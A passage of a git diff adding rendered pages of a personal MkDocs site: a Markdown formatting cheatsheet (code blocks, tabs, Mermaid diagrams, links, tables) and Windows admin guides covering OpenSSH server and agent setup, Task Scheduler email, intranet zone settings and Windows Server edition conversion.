+##### Heading 5 <small>with secondary text</small>
+
+###### Heading 5 <small>with secondary text</small>
+
Result:
Heading 3 with secondary text Heading 4 with secondary text Heading 5 with secondary text Heading 6 with secondary text Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/code-blocks/index.html b/utilities/markdown-cheatsheet/code-blocks/index.html
new file mode 100644
index 000000000..ed299f5ad
--- /dev/null
+++ b/utilities/markdown-cheatsheet/code-blocks/index.html
@@ -0,0 +1,180 @@
+ Code Blocks - 3os markdown-cheatsheet mkdocs code-blocks Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Markdown Code Blocks Code blocks and examples are an essential part of technical project documentation. Material for MkDocs provides different ways to set up syntax highlighting for code blocks, either during build time using [Pygments] or during runtime using a JavaScript syntax highlighter.
Adding a Title In order to provide additional context, a custom title can be added to a code block by using the title="<custom title>"
option directly after the shortcode, e.g. to display the name of a file:
Example:
Code block with title ```py title="bubble_sort.py"
+def bubble_sort(items):
+ for i in range(len(items)):
+ for j in range(len(items) - 1 - i):
+ if items[j] > items[j + 1]:
+ items[j], items[j + 1] = items[j + 1], items[j]
+```
+
Result:
bubble_sort.py def bubble_sort ( items ):
+ for i in range ( len ( items )):
+ for j in range ( len ( items ) - 1 - i ):
+ if items [ j ] > items [ j + 1 ]:
+ items [ j ], items [ j + 1 ] = items [ j + 1 ], items [ j ]
+
Adding Line Numbers To Code Block Example:
Line numbers can be added to a code block by using the linenums="<start>"
option directly after the shortcode, whereas <start>
represents the starting line number. A code block can start from a line number other than 1
, which allows to split large code blocks for readability:
Code block with line numbers ```py linenums="1"
+def bubble_sort(items):
+ for i in range(len(items)):
+ for j in range(len(items) - 1 - i):
+ if items[j] > items[j + 1]:
+ items[j], items[j + 1] = items[j + 1], items[j]
+```
+
Result:
def bubble_sort ( items ):
+ for i in range ( len ( items )):
+ for j in range ( len ( items ) - 1 - i ):
+ if items [ j ] > items [ j + 1 ]:
+ items [ j ], items [ j + 1 ] = items [ j + 1 ], items [ j ]
+
Highlighting Specific Lines Specific lines can be highlighted by passing the line numbers to the hl_lines
argument placed right after the language shortcode. Note that line counts start at 1
.
Code block with highlighted lines ```py hl_lines="2 3"
+def bubble_sort(items):
+ for i in range(len(items)):
+ for j in range(len(items) - 1 - i):
+ if items[j] > items[j + 1]:
+ items[j], items[j + 1] = items[j + 1], items[j]
+```
+
Result:
def bubble_sort ( items ):
+ for i in range ( len ( items )):
+ for j in range ( len ( items ) - 1 - i ):
+ if items [ j ] > items [ j + 1 ]:
+ items [ j ], items [ j + 1 ] = items [ j + 1 ], items [ j ]
+
Highlighting Inline Code Blocks When InlineHilite
is enabled, syntax highlighting can be applied to inline code blocks by prefixing them with a shebang, i.e. #!
, directly followed by the corresponding language shortcode
Example:
Inline code block The `#!python range()` function is used to generate a sequence of numbers.
+
Result:
The range ()
function is used to generate a sequence of numbers.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/content-tabs/index.html b/utilities/markdown-cheatsheet/content-tabs/index.html
new file mode 100644
index 000000000..818ed7f8d
--- /dev/null
+++ b/utilities/markdown-cheatsheet/content-tabs/index.html
@@ -0,0 +1,210 @@
+ Content Tabs - 3os markdown-cheatsheet mkdocs content-tabs Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-04-24 Markdown Content Tabs Sometimes, it's desirable to group alternative content under different tabs, e.g. when describing how to access an API from different languages or environments. Material for MkDocs allows for beautiful and functional tabs, grouping code blocks and other content.
Usage Grouping code blocks Code blocks are one of the primary targets to be grouped, and can be considered a special case of content tabs, as tabs with a single code block are always rendered without horizontal spacing:
Example:
Content tabs with code blocks === "C"
+
+ ``` c
+ #include <stdio.h>
+
+ int main(void) {
+ printf("Hello world!\n");
+ return 0;
+ }
+ ```
+
+=== "C++"
+
+ ``` c++
+ #include <iostream>
+
+ int main(void) {
+ std::cout << "Hello world!" << std::endl;
+ return 0;
+ }
+ ```
+
Result:
Grouping other content When a content tab contains more than one code block, it is rendered with horizontal spacing. Vertical spacing is never added, but can be achieved by nesting tabs in other blocks:
Example:
Content tabs === "Unordered list"
+
+ * Sed sagittis eleifend rutrum
+ * Donec vitae suscipit est
+ * Nulla tempor lobortis orci
+
+=== "Ordered list"
+
+ 1. Sed sagittis eleifend rutrum
+ 2. Donec vitae suscipit est
+ 3. Nulla tempor lobortis orci
+
Result:
Embedded content When [SuperFences] is enabled, content tabs can contain arbitrary nested content, including further content tabs, and can be nested in other blocks like [admonitions] or blockquotes:
Example:
Content tabs in admonition !!! example
+
+ === "Unordered List"
+
+ ``` markdown
+ * Sed sagittis eleifend rutrum
+ * Donec vitae suscipit est
+ * Nulla tempor lobortis orci
+ ```
+
+ === "Ordered List"
+
+ ``` markdown
+ 1. Sed sagittis eleifend rutrum
+ 2. Donec vitae suscipit est
+ 3. Nulla tempor lobortis orci
+ ```
+
Result:
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/diagrams/index.html b/utilities/markdown-cheatsheet/diagrams/index.html
new file mode 100644
index 000000000..62a436fe8
--- /dev/null
+++ b/utilities/markdown-cheatsheet/diagrams/index.html
@@ -0,0 +1,260 @@
+ Diagrams - 3os markdown-cheatsheet mkdocs diagram mermaid Authors: fire1ce | Created: 2022-02-26 | Last update: 2022-04-03 Mermaid Diagrams Diagrams help to communicate complex relationships and interconnections between different technical components, and are a great addition to project documentation. Material for MkDocs integrates with Mermaid.js , a very popular and flexible solution for drawing diagrams.
Usage Using Flowcharts Flowcharts are diagrams that represent workflows or processes. The steps are rendered as nodes of various kinds and are connected by edges, describing the necessary order of steps:
Flow chart ```mermaid
+graph LR
+ A[Start] --> B{Error?};
+ B -->|Yes| C[Hmm...];
+ C --> D[Debug];
+ D --> B;
+ B ---->|No| E[Yay!];
+```
+
Result:
graph LR
+ A[Start] --> B{Error?};
+ B -->|Yes| C[Hmm...];
+ C --> D[Debug];
+ D --> B;
+ B ---->|No| E[Yay!];
Using Sequence Diagrams Sequence diagrams describe a specific scenario as sequential interactions between multiple objects or actors, including the messages that are exchanged between those actors:
Sequence diagram ```mermaid
+sequenceDiagram
+ Alice->>John: Hello John, how are you?
+ loop Healthcheck
+ John->>John: Fight against hypochondria
+ end
+ Note right of John: Rational thoughts!
+ John-->>Alice: Great!
+ John->>Bob: How about you?
+ Bob-->>John: Jolly good!
+```
+
Result:
sequenceDiagram
+ Alice->>John: Hello John, how are you?
+ loop Healthcheck
+ John->>John: Fight against hypochondria
+ end
+ Note right of John: Rational thoughts!
+ John-->>Alice: Great!
+ John->>Bob: How about you?
+ Bob-->>John: Jolly good!
Using State Diagrams State diagrams are a great tool to describe the behavior of a system, decomposing it into a finite number of states, and transitions between those states:
State diagram ```mermaid
+stateDiagram-v2
+ state fork_state <<fork>>
+ [*] --> fork_state
+ fork_state --> State2
+ fork_state --> State3
+
+ state join_state <<join>>
+ State2 --> join_state
+ State3 --> join_state
+ join_state --> State4
+ State4 --> [*]
+```
+
Result:
stateDiagram-v2
+ state fork_state <<fork>>
+ [*] --> fork_state
+ fork_state --> State2
+ fork_state --> State3
+
+ state join_state <<join>>
+ State2 --> join_state
+ State3 --> join_state
+ join_state --> State4
+ State4 --> [*]
Using Class Diagrams Class diagrams are central to object oriented programing, describing the structure of a system by modelling entities as classes and relationships between them:
Class diagram ```mermaid
+classDiagram
+ Person <|-- Student
+ Person <|-- Professor
+ Person : +String name
+ Person : +String phoneNumber
+ Person : +String emailAddress
+ Person: +purchaseParkingPass()
+ Address "1" <-- "0..1" Person:lives at
+ class Student{
+ +int studentNumber
+ +int averageMark
+ +isEligibleToEnrol()
+ +getSeminarsTaken()
+ }
+ class Professor{
+ +int salary
+ }
+ class Address{
+ +String street
+ +String city
+ +String state
+ +int postalCode
+ +String country
+ -validate()
+ +outputAsLabel()
+ }
+```
+
Result:
classDiagram
+ Person <|-- Student
+ Person <|-- Professor
+ Person : +String name
+ Person : +String phoneNumber
+ Person : +String emailAddress
+ Person: +purchaseParkingPass()
+ Address "1" <-- "0..1" Person:lives at
+ class Student{
+ +int studentNumber
+ +int averageMark
+ +isEligibleToEnrol()
+ +getSeminarsTaken()
+ }
+ class Professor{
+ +int salary
+ }
+ class Address{
+ +String street
+ +String city
+ +String state
+ +int postalCode
+ +String country
+ -validate()
+ +outputAsLabel()
+ }
Using Entity-Relationship Diagrams An entity-relationship diagram is composed of entity types and specifies relationships that exist between entities. It describes inter-related things in a specific domain of knowledge:
Entity-relationship diagram ```mermaid
+erDiagram
+ CUSTOMER ||--o{ ORDER : places
+ ORDER ||--|{ LINE-ITEM : contains
+ CUSTOMER }|..|{ DELIVERY-ADDRESS : uses
+```
+
Result:
erDiagram
+ CUSTOMER ||--o{ ORDER : places
+ ORDER ||--|{ LINE-ITEM : contains
+ CUSTOMER }|..|{ DELIVERY-ADDRESS : uses
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/external-markdown/index.html b/utilities/markdown-cheatsheet/external-markdown/index.html
new file mode 100644
index 000000000..51bd9e447
--- /dev/null
+++ b/utilities/markdown-cheatsheet/external-markdown/index.html
@@ -0,0 +1,146 @@
+ Embed External Markdown - 3os markdown-cheatsheet mkdocs external-markdown Authors: fire1ce | Created: 2022-02-26 | Last update: 2022-04-03 Embed External Markdown MkDocs Embed External Markdown plugin that allows to inject section or full markdown content from a given url. The goal is to embed different markdown from different sources inside your MkDocs project.
For more detailed information follow the link: MkDocs Embed External Markdown Plugin
Usage Section defined by "##/###/####..." header (h2/h3/h4...) "#" header (h1) will be removed from source content so you can use your own header "##/###/####..." header (h2/h3/h4...) will be removed from source section content so you can use your own header Supports multiple sections from any source external_markdown
requires 2 parameters: url and section name .
{{ external_markdown('url', '## section name') }}
+
Full Markdown Content Embed full markdown content from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '') }}
+
Specific Section Embed markdown section from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '## Installation') }}
+
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/icons/index.html b/utilities/markdown-cheatsheet/icons/index.html
new file mode 100644
index 000000000..e4a593a11
--- /dev/null
+++ b/utilities/markdown-cheatsheet/icons/index.html
@@ -0,0 +1,149 @@
+ Icons & Emojis - 3os markdown-cheatsheet mkdocs icons emojis Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Icons & Emojis One of the best features of Material for MkDocs is the possibility to use thousands of emojis in your project documentation with practically zero additional effort. Use Mkdocs Material Icon Search to find the icons and emojis you need.
Usage Example:
:fontawesome-regular-bell: - Fontawesome Icon: Bell
+:material-bell: - Material Icon: Bell
+:octicons-bell-24: - Octicons Icon: Bell
+:bell: - Emoji: Bell
+
Result:
- Fontawesome Icon: Bell - Material Icon: Bell - Octicons Icon: Bell - Emoji: Bell
Keyboard Keys Icons Example:
Result:
Ctrl + Alt + Del
Cmd + Ctrl + Option
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/images/index.html b/utilities/markdown-cheatsheet/images/index.html
new file mode 100644
index 000000000..05a64ed4f
--- /dev/null
+++ b/utilities/markdown-cheatsheet/images/index.html
@@ -0,0 +1,161 @@
+ Images - 3os markdown-cheatsheet mkdocs images Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Markdown Images Markdown is a text format so naturally you can type in the Markdown representation of an image using examples below to put an image reference directly into the editor.
Warning
This site uses the Material Design for MkDocs theme with the following CSS overrides; therefore the results in your case may differ.
Custom css /* images css */
+. md-typeset img {
+ border-radius : 5 px ;
+ height : auto ;
+ max-width : 95 % ;
+ margin : auto ;
+ display : block ;
+ box-shadow : rgba ( 149 , 157 , 165 , 0.2 ) 0 px 8 px 24 px ;
+}
+
Embedding Images Internal source example ![minion][internal-source]
+
+[internal-source ]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'
+
External source example ![minion][external-source]
+
+[external-source ]: https://octodex.github.com/images/minion.png 'Title of the image'
+
Result:
Embedding Images With Width Attributes width=200 example ![minion][internal-source]{: style="width:200px"}
+
+[internal-source ]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'
+
Result:
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/links/index.html b/utilities/markdown-cheatsheet/links/index.html
new file mode 100644
index 000000000..86821bd8f
--- /dev/null
+++ b/utilities/markdown-cheatsheet/links/index.html
@@ -0,0 +1,159 @@
+ Links - 3os markdown-cheatsheet mkdocs links Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-27 Markdown Links Link With Title Link with Title Example [My Github Page ][github-url ]
+
+[github-url ]: https://github.com/fire1ce 'Title of the link'
+
Result:
My Github Page
Open In New Tab Append (target=\_blank)
to the end of the link.
Open In New Tab Link Example [My Github Page ][github-url ]{target=\_blank}
+
+[github-url ]: https://github.com/fire1ce 'Title of the link'
+
Result:
My Github Page
Result:
Internal Anchor Links Internal Anchor Links Example [Jumps to section in page ][internal-anchor-link ]
+
+[internal-anchor-link ]: /utilities/markdown-cheatsheet/tables-lists-quotes/#lists 'Internal Anchor Links'
+
Result:
Jumps to section in page
Image With Links Image With Links Example [![This is Image with link ][image-link ]][url-link]{target=\_blank}
+
+[image-link ]: /assets/images/markdown-cheatsheet/minion200x200.png 'Minion'
+[url-link ]: https://github.com/fire1ce 'Go to Github'
+
Result:
Mailto
Link Mailto Link Example [Send Email ][mail-to-link ]
+
+[mail-to-link ]: mailto:example@example.com 'Send Email'
+
Result:
Send Email
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/tables-lists-quotes/index.html b/utilities/markdown-cheatsheet/tables-lists-quotes/index.html
new file mode 100644
index 000000000..82ba2275b
--- /dev/null
+++ b/utilities/markdown-cheatsheet/tables-lists-quotes/index.html
@@ -0,0 +1,188 @@
+ Tables, Lists and Quotes - 3os markdown-cheatsheet mkdocs tables lists quotes Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-04-03 Tables, Lists and Quotes Tables A table in Markdown consists of two parts: the header and the rows of data in the table. As per the Markdown spec:
pipe (|) character separates the individual columns in a table. (-) hyphens act as a delimiter row to separate the header row from the body. (:) colon to align cell contents. Table Example | **Option** | **Description** |
+| ---------- | ------------------------------------------ |
+| data | path to data files to supply the data. |
+| engine | engine to be used for processing templates |
+| ext | extension to be used for dest files. |
+
Result:
Option Description data path to data files to supply the data. engine engine to be used for processing templates ext extension to be used for dest files.
Column Alignment If you want to align a specific column to the left
, center
or right
, you can use the [regular Markdown syntax] placing :
characters at the beginning and/or end of the divider.
Lists Unordered List Bullet point lists can be created by starting each line with an asterisk followed by a space before the content of the bullet point. Note that the space is important and should not be forgotten.
Example:
Unordered List Example - Lorem ipsum dolor sit amet
+- Consectetur adipiscing elit
+- Integer molestie lorem at massa
+- Facilisis in pretium nisl aliquet
+
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Facilisis in pretium nisl aliquet Ordered List Similarly, numbered lists can be created by starting each line with a number followed by a space and then the relevant text.
Ordered List Example 1. Lorem ipsum dolor sit amet
+2. Consectetur adipiscing elit
+3. Integer molestie lorem at massa
+4. Faucibus porta lacus fringilla vel
+5. Aenean sit amet erat nunc
+6. Eget porttitor lorem
+
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Faucibus porta lacus fringilla vel Aenean sit amet erat nunc Eget porttitor lorem Blocks List Blocks List Example > - list under lists
+> - under lists
+
Result:
list under lists under lists Tasklists A task list is a set of tasks that each render on a separate line with a clickable checkbox. You can select or deselect the checkboxes to mark the tasks as complete or incomplete.
You can use Markdown to create a task list in any comment on GitHub. If you reference an issue, pull request, or discussion in a task list, the reference will unfurl to show the title and state.
Example:
Task List Example - [x] Lorem ipsum dolor sit amet, consectetur adipiscing elit
+- [ ] Vestibulum convallis sit amet nisi a tincidunt
+ - [x] In hac habitasse platea dictumst
+ - [x] In scelerisque nibh non dolor mollis congue sed et metus
+ - [ ] Praesent sed risus massa
+- [ ] Aenean pretium efficitur erat, donec pharetra, ligula non scelerisque
+
Result:
Block Quotes For quoting blocks of content from another source within your document.
Add >
before any text you want to quote.
Quoting Blocks Example > Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.
+> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
+
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
Nested Block Quotes Quoting Blocks Nested Example > Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.
+> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
+>
+> > Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio
+> > non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.
+
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.
Back to top
\ No newline at end of file
diff --git a/utilities/useful-links-tools/index.html b/utilities/useful-links-tools/index.html
new file mode 100644
index 000000000..a2b89f8f7
--- /dev/null
+++ b/utilities/useful-links-tools/index.html
@@ -0,0 +1,167 @@
+ Useful Links & Tools - 3os utilities Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02
Back to top
\ No newline at end of file
diff --git a/utilities/wifiQrGenerator/index.html b/utilities/wifiQrGenerator/index.html
new file mode 100644
index 000000000..2f123b6c6
--- /dev/null
+++ b/utilities/wifiQrGenerator/index.html
@@ -0,0 +1,167 @@
+ Wifi QR Image Generator - 3os utilities Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Wifi QR Image Generator Description This will generate a QR code that can be used with any iOS/Android device to access a given Wifi without manually adding a network and password. Just scan the QR Code and you are connected. This is fully static code - no data is sent to any server!
Generator
Credit & Sources This code was taken from this site qistoph Github Page . It was fully reviewed for any malicious code or functionality and slightly modified to fit this site
Back to top
\ No newline at end of file
diff --git a/windows/guides/declare-locations/index.html b/windows/guides/declare-locations/index.html
new file mode 100644
index 000000000..2b236620a
--- /dev/null
+++ b/windows/guides/declare-locations/index.html
@@ -0,0 +1,171 @@
+ Declare Locations as "Inside Your Local Network" - 3os utilities network windows Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-08-02 Declare Locations as "Inside Your Local Network" The Intranet Zone is the most trusted and least protected zone. DO NOT put any subnets or IP addresses in this zone unless they are TOTALLY under YOUR control. That includes ANY public server, web site, subnet, or IP address.
Select 'Control Panel'/'Internet Properties'/'Security' tab. (Alternatively, open Internet Explorer and select 'Tools'/'Internet Options'/'Security' tab.)
Highlight 'Local Intranet' and click 'Sites'.
Set the following: Uncheck 'Automatically detect intranet network'.Check 'Include all local (intranet) sites not listed in other zones'.Uncheck 'Include all sites that bypass the proxy server'.Check 'Include all network paths (UNCs)'.​
Click 'Advanced'
Uncheck 'Require server verification (https:) for all sites in this zone'.
In the field labeled 'Add this web site to the zone:', add your local, private subnet using an asterisk for a network mask and click 'Add'. E.g. If your home (local) network is 192.168.25.0 with a mask of 255.255.255.0, enter '192.168.25.*' (without the quotes).
Entries can be:​
* Individual IP addresses (e.g. '192.168.5.25', etc.),
+* Class C subnets (e.g. '192.168.27.*'),
+* Class B subnets (e.g. '172.16.*.*'), or
+* Class A subnets (e.g. '10.*.*.*')​
+
You can add as many addresses as you need to the list. It can be handy to add the address of a VPN subnet to the list if it is also private and you TOTALLY trust it.
Close out with 'Close'/'OK'/'OK' and close the Control Panel (or Internet Explorer).
Back to top
\ No newline at end of file
diff --git a/windows/guides/email-from-task-scheduler/index.html b/windows/guides/email-from-task-scheduler/index.html
new file mode 100644
index 000000000..49fb122d9
--- /dev/null
+++ b/windows/guides/email-from-task-scheduler/index.html
@@ -0,0 +1,168 @@
+ Send Emails From The Windows Task Scheduler - 3os utilities windows Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Send Emails From The Windows Task Scheduler First, download SendEmail , a free (and open source) tool for sending emails from the command line. Extract the downloaded archive into a folder on your computer.
Next, launch the Windows Task Scheduler and create a new task – consult our guide to creating scheduled tasks for more information. You can create a task that automatically sends an email at a specific time or a task that sends an email in response to a specific event.
When you reach the Action window, select Start a program instead of Send an e-mail.
In the Program/script box, use the Browse button and navigate to the SendEmail.exe file on your computer.
Finally, you’ll have to add the arguments required to authenticate with your SMTP server and construct your email. Here’s a list of the options you can use with SendEmail:
Server Options -f EMAIL – The email address you’re sending from. -s SERVER:PORT – The SMTP server and port it requires. -xu USERNAME – The username you need to authenticate with the SMTP server. -xp PASSWORD – The password you need to authenticate with the SMTP server. -o tls=yes – Enables TLS encryption. May be necessary for some SMTP servers. If you’re using Gmail’s SMTP servers, these are the server options you’ll need:
Of course, you’ll have to enter your own email address and password here.
Destination Options -t EMAIL – The destination email address. You can send an email to multiple addresses by including a space between each address after the -t option. -cc EMAIL – Any addresses you’d like to CC on the email. You can specify multiple addresses by placing a space between each email address, just as with the -t command above. -bcc EMAIL – The BCC version of the CC option above. Email Options -u SUBJECT – The subject of your email -m BODY – The message body text of your email. -a ATTACHMENT – The path of a file you’d like to attach. This is optional. For example, let’s say your email address is example@gmail.com and you’d like to send an email to person@example.com
. You’d use the following options:
-f example@gmail.com -t person@example.com -u Subject -m This is the body text! -s smtp.gmail.com:587 -xu example@gmail.com -xp password -o tls=yes
+
Once you’ve put together your options, copy and paste them into the Add arguments box.
Save your task and you’re done. Your task will automatically send email on the schedule (or in response to the event) you specified.
Back to top
\ No newline at end of file
diff --git a/windows/ssh-server/index.html b/windows/ssh-server/index.html
new file mode 100644
index 000000000..c8124f625
--- /dev/null
+++ b/windows/ssh-server/index.html
@@ -0,0 +1,179 @@
+ Windows SSH Server - 3os windows ssh-server powershell rsa-keys Authors: fire1ce | Created: 2022-04-21 | Last update: 2022-04-21 Windows SSH Server Sometimes you need to connect to a remote server via SSH
. Usually it's the main connection to linux servers. But you can also connect to a windows server via SSH
. At this guide we will show you how to install and configure a windows ssh server, including SSH Keys authentication
.
SSH Server Installation on Windows We will be using PowerShell to install the SSH server including the SSH client.
Open PowerShell Terminal as Administrator.
Run the following commands to install the SSH server and client.
Add-WindowsCapability -Online -Name OpenSSH . Client ~~~~ 0 . 0 . 1 . 0
+Add-WindowsCapability -Online -Name OpenSSH . Server ~~~~ 0 . 0 . 1 . 0
+
After the installation you can check that the Windows SSH server and client are installed.
Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'
+
The output will be something like this:
To start the Windows SSH server service
Enable Windows SSH Server on Windows Boot
Set-Service -Name sshd -StartupType 'Automatic'
+
Add a Firewall rule to allow the SSH port
if (!( Get-NetFirewallRule -Name "OpenSSH-Server-In-TCP" -ErrorAction SilentlyContinue | Select-Object Name , Enabled )) { Write-Output "Firewall Rule 'OpenSSH-Server-In-TCP' does not exist, creating it..." New-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 } else { Write-Output "Firewall rule 'OpenSSH-Server-In-TCP' has been created and exists." }
+
At this point you should be able to connect via SSH to the Windows server with your username and password.
Adding SSH Keys Administrator User Create the file: administrators_authorized_keys
at the following location:
C:\ProgramData\ssh\administrators_authorized_keys
+
Edit the file and add your SSH public key to the file.
Now we need to import the SSH public key to the Windows SSH server. We can do this by using the following command:
icacls . exe "C:\ProgramData\ssh\administrators_authorized_keys" / inheritance : r / grant "Administrators:F" / grant "SYSTEM:F"
+
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect to the Windows server with your SSH key
Regular User (non-administrator) Create a .ssh
directory in the home directory of the user.
```path
+C:\Users\<username>\.ssh\
+
Create the file: authorized_keys
at the following location:
C:\Users\<username>\.ssh\authorized_keys
+
Edit the file and add your SSH public key to the file.
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect with non-administrator user to the Windows server with your SSH key
PowerShell
as Default Shell for SSH By default the SSH client uses the Windows command prompt as the default shell.
We can change the default shell to PowerShell running the following PowerShell command:
New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -PropertyType String -Force
+
The next time you connect to the Windows SSH server it should start the PowerShell shell.
It should look something like this:
Back to top
\ No newline at end of file
diff --git a/windows/useful-software/index.html b/windows/useful-software/index.html
new file mode 100644
index 000000000..758774b77
--- /dev/null
+++ b/windows/useful-software/index.html
@@ -0,0 +1,167 @@
+ Useful Software - 3os
\ No newline at end of file
diff --git a/windows/windows-servers/index.html b/windows/windows-servers/index.html
new file mode 100644
index 000000000..d341d89cd
--- /dev/null
+++ b/windows/windows-servers/index.html
@@ -0,0 +1,171 @@
+ Windows Servers - 3os utilities windows servers Authors: fire1ce | Created: 2021-12-02 | Last update: 2022-08-02 Windows Servers Basic Setup At Server Manager click Configure this local server
Computer name - rename the server's name Remote Desktop - allow RDP Ethernet instance - disable IPV6 Feedback & Diagnostics - set Feedback frequency
to Never
IE Enhanced Security Configuration - Off Time zone - set the current timezone, At Internet Time
tab change time.windows.com
to time.nist.gov
Open gpedit.msc with Run
Local Computer Policy -> Administrative Templates -> System -> Display Shutdown Even Tracker - Disable Local Computer Policy -> Windows Settings -> Security Settings -> Local Policies -> Security Options ->Interactive logon: Do not require CTRL+ALT+DEL - Enable Convert Evaluation Copy to Full Version When using the Evaluation version of Windows Server, the desktop displays the current build and the time until the end of the grace period (Windows License valid for 180 days).
Windows Server 2022 Run from Powershell:
Windows Server 2022 Standard
dism / online / set-edition : serverstandard / productkey : VDYBN - 27WPP-V4HQT - 9VMD4-VMK7H / accepteula
+
Windows Server 2022 Datacenter:
dism / online / set-edition : serverdatacenter / productkey : WX4NM-KYWYW-QJJR4-XV3QB - 6VM33 / accepteula
+
Windows Server 2019 Run from Powershell:
Windows Server 2019 Standard
dism / online / set-edition : ServerStandard / productkey : N69G4-B89J2 - 4G8F4-WWYCC-J464C / accepteula
+
Windows Server 2019 Datacenter:
dism / online / set-edition : ServerDatacenter / productkey : WMDGN-G9PQG-XVVXX-R3X43 - 63DFG / accepteula
+
Back to top
\ No newline at end of file
diff --git a/windows/windows-ssh-agent-with-keys/index.html b/windows/windows-ssh-agent-with-keys/index.html
new file mode 100644
index 000000000..a37222394
--- /dev/null
+++ b/windows/windows-ssh-agent-with-keys/index.html
@@ -0,0 +1,187 @@
+ Windows SSH with ed25519 Keys - 3os SSH Windows ed25519 OpenSSH Git Security Authors: fire1ce | Created: 2023-07-05 | Last update: 2023-07-05 Windows SSH Client with ed25519 Keys for Secure Connections In the modern digital age, ensuring the security of your connections is critical. This guide will walk you through the steps to configure the SSH client and SSH agent on Windows using ed25519 keys, allowing for secure connections to services like Git and remote servers.
Introduction to SSH and ed25519 Keys SSH, or Secure Shell, is a cryptographic network protocol for secure communication over an unsecured network. It is particularly used for secure logins, file transfers, and command-line operations.
ed25519 is a public-key signature system that is renowned for high security with relatively short key lengths. This makes it faster and more efficient compared to older algorithms such as RSA.
OpenSSH Client Installation To utilize SSH, you need to ensure that the OpenSSH client is installed on your Windows system.
Note
The steps below should be performed in PowerShell with Administrator privileges.
Check if OpenSSH Client is available by running the following cmdlet: Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'
+
If OpenSSH Client is not installed, the output will be:
Name: OpenSSH.Client~~~~0.0.1.0
+State: NotPresent
+
If it's not present, proceed to the next step to install it.
Install the OpenSSH Client by running the following command: # Install the OpenSSH Client
+Add-WindowsCapability -Online -Name OpenSSH . Client ~~~~ 0 . 0 . 1 . 0
+
The command should return:
Path:
+Online: True
+RestartNeeded: False
+
Setting Up SSH Agent in Windows The SSH Agent is a background service that stores your keys. When connecting to a remote host using SSH, the agent can automatically provide the key.
Note
The steps below should be performed in PowerShell with Administrator privileges.
Set SSH Agent to start automatically at boot : Set-Service -Name ssh-agent -StartupType 'Automatic'
+
Start the SSH Agent service : Start-Service -Name ssh-agent
+
Test the SSH Agent Is Running : Get-Service -Name ssh-agent
+
The output should be:
Status Name DisplayName
+------ ---- -----------
+Running ssh-agent OpenSSH Authentication Agent
+
Generating and Adding ed25519 SSH Keys Note
The steps below should be performed in PowerShell with regular user privileges.
Generate ed25519 SSH keys : ssh-keygen -t ed25519 -C "your_email@example.com"
+
This command generates an ed25519 key pair. The default location for the keys is C:\Users\<YourUsername>\.ssh
. The private key is named id_ed25519
and the public key is named id_ed25519.pub
.
Adding the ed25519 SSH Key to the SSH Agent : ssh-add $env :USERPROFILE\. ssh\i d_ed25519
+
If your keys are stored in a different location or have a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\p ath\t o\y our\p rivate-key-file
+
Importing Existing ed25519 SSH Keys (Optional) If you already have an existing pair of ed25519 SSH keys that you would like to use, you can import them into your SSH Agent.
Note
The steps below should be performed in PowerShell with regular user privileges.
Copy your existing private key to the default SSH folder . The default folder for SSH keys is typically C:\Users\<YourUsername>\.ssh
. Make sure the private key file you are copying is named id_ed25519
.
Add the existing ed25519 SSH Key to the SSH Agent :
ssh-add $env :USERPROFILE\. ssh\i d_ed25519
+
Note: If your private key file is located in a different path or has a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\p ath\t o\y our\p rivate-key-file
+
Copy your existing public key to the servers or services you want to connect to. This typically involves appending the contents of your public key file to the ~/.ssh/authorized_keys
